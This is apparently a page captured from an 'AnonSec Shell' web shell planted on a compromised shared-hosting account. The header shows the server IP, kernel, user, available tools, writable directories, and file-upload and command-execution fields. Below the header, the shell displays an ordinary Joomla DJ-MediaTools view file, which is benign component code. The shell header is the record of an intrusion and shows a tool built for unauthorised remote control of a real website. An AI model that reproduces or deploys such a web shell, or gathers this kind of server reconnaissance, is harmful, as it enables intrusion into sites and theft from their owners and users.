AnonSec Shell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.112
Web Server : Apache
System : Linux webm013.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : coopiak ( 151928)
PHP Version : 8.3.23
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/coopiak/amisdesseniors-fr/brest/components/com_djmediatools/views/item/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/coopiak/amisdesseniors-fr/brest/components/com_djmediatools/views/item/view.html.php
<?php
/**
 * @version $Id$
 * @package DJ-MediaTools
 * @copyright Copyright (C) 2017 DJ-Extensions.com, All rights reserved.
 * @license http://www.gnu.org/licenses GNU/GPL
 * @author url: http://dj-extensions.com
 * @author email contact@dj-extensions.com
 * @developer Szymon Woronowski - szymon.woronowski@design-joomla.eu
 *
 * DJ-MediaTools is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * DJ-MediaTools is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with DJ-MediaTools. If not, see <http://www.gnu.org/licenses/>.
 *
 */

defined ('_JEXEC') or die('Restricted access');

jimport('joomla.application.component.view');
jimport('joomla.application.component.model');

require_once(JPATH_COMPONENT . '/helpers/helper.php');

class DJMediatoolsViewItem extends JViewLegacy {

	protected $params = null;
	protected $category = null;
	protected $slides = null;
	protected $current = null;
	protected $modules = null;

	function display($tpl = null) {

		// Initialise variables
		JModelLegacy::addIncludePath(JPATH_COMPONENT.'/models');
		$model = JModelLegacy::getInstance('Categories','DJMediaToolsModel',array('ignore_request'=>true));

		$model->setState('category.id',JFactory::getApplication()->input->get('cid', 0, '', 'int'));
		$id = JFactory::getApplication()->input->get('id', 0, '', 'int');
		$params = $model->getParams();
		$category = $model->getItem();

		// Check for errors.
		if (count($errors = $this->get('Errors'))) {
			JError::raiseWarning(500, implode("\n", $errors));
			return false;
		}

		if ($category === false)
		{
			JError::raiseError(404, JText::_('COM_DJMEDIATOOLS_ERROR_CATEGORY_NOT_FOUND'));
			return false;
		}

		// get gallery slides and layout
		$helper = DJMediatoolsLayoutHelper::getInstance('slideshow');
		$params->def('category',$category->id.':'.$category->alias);
		$params->def('source',$category->source);
		$params = $helper->getParams($params);
		$this->slides = $helper->getSlides($params);

		foreach($this->slides as $key => $slide) {
			if($id == (int) $slide->id) {
				$this->current = $key;
				break;
			}
		}

		if (is_null($this->current)) {
			JError::raiseError(404, JText::_('COM_DJMEDIATOOLS_ERROR_ITEM_NOT_FOUND'));
			return false;
		}

		//Escape strings for HTML output
		$this->pageclass_sfx = htmlspecialchars($params->get('pageclass_sfx',''));

		$this->params = $params;
		$this->album = $category;

		// render modules
//		$document	= JFactory::getDocument();
		$renderer	= $this->document->loadRenderer('module');
		$position	= 'djmt-item-desc';
		$modules	= JModuleHelper::getModules($position);
		$mparams		= array('style' => 'xhtml');

		ob_start();
		foreach ($modules as $module) {
			echo $renderer->render($module, $mparams);
		}
		$this->modules[$position] = ob_get_clean();

		$this->_prepareDocument();

        parent::display($tpl);
	}

	protected function _prepareDocument() {

		$app	= JFactory::getApplication();
		$menus	= $app->getMenu();
		$pathway= $app->getPathway();
		$title	= null;

		if(isset($this->slides[$this->current]->canonical)) {
			foreach($this->document->_links as $key => $headlink) {
				if ($headlink['relation'] == 'canonical' ) {
					unset($this->document->_links[$key]);
				}
			}
			$this->document->addHeadLink($this->slides[$this->current]->canonical, 'canonical');
		}

		if($this->params->get('zoom',1) && version_compare(JVERSION, '4', '<')) { // Joomla 3) { // first must be the zoomer script
			JHTML::_('behavior.framework');
			$this->document->addScript('components/com_djmediatools/assets/js/zoomer.js');
			$this->document->addScriptDeclaration(" window.addEvent('load', function(){ new Zoomer('dj-image',{big: '".$this->slides[$this->current]->image."', smooth: 10 }); }); ");
		}

		$j3 = version_compare(JVERSION, '3.0.0', 'ge');
		if($j3) JHTML::_('jquery.framework');
		else $document->addScript('//ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js');
		// then script to center image vertically
		$this->document->addScript('components/com_djmediatools/assets/js/item.js');

		// set admin for facebook comments
		if((int)$this->params->get('comments') == 3 && $this->params->get('facebook_admins')) {
			$admins = explode(',', $this->params->get('facebook_admins'));
			foreach($admins as $admin) {
				$admin = trim($admin);
				if(!is_numeric($admin)) {
					$res = file_get_contents('http://graph.facebook.com/'.$admin);
					$obj = json_decode($res);
					$admin = $obj->id;
				}
				$this->document->addCustomTag('<meta property="fb:admins" content="'.$admin.'" />');
			}
			$this->document->addCustomTag('<meta property="og:title" content="'.$this->escape($this->slides[$this->current]->title).'" />');
			$this->document->addCustomTag('<meta property="og:description" content="'.$this->escape(strip_tags($this->slides[$this->current]->description)).'" />');
			$this->document->addCustomTag('<meta property="og:image" content="'.$this->slides[$this->current]->image.'" />');
			$this->document->addCustomTag('<meta property="og:url" content="'.$this->slides[$this->current]->comments.'" />');
		}

		// Because the application sets a default page title,
		// we need to get it from the menu item itself
		$menu = $menus->getActive();
		if ($menu)
		{
			$this->params->def('page_heading', $this->params->get('page_title', $menu->title));
		} else {
			$this->params->def('page_heading', JText::_('COM_DJMEDIATOOLS'));
		}
		$title = $this->params->get('page_title', '');

		$id = (int) @$menu->query['id'];

		if (empty($title)) {
			$title = $app->getCfg('sitename');
		}
		elseif ($app->getCfg('sitename_pagetitles', 0) == 1) {
			$title = JText::sprintf('JPAGETITLE', $app->getCfg('sitename'), $title);
		}
		elseif ($app->getCfg('sitename_pagetitles', 0) == 2) {
			$title = JText::sprintf('JPAGETITLE', $title, $app->getCfg('sitename'));
		}
		$this->document->setTitle($title);

		if ($this->params->get('menu-meta_description'))
		{
			$this->document->setDescription($this->params->get('menu-meta_description'));
		}

		if ($this->params->get('menu-meta_keywords'))
		{
			$this->document->setMetadata('keywords', $this->params->get('menu-meta_keywords'));
		}

		if ($this->params->get('robots'))
		{
			$this->document->setMetadata('robots', $this->params->get('robots'));
		}

	}

}

Anon7 - 2022
AnonSec Team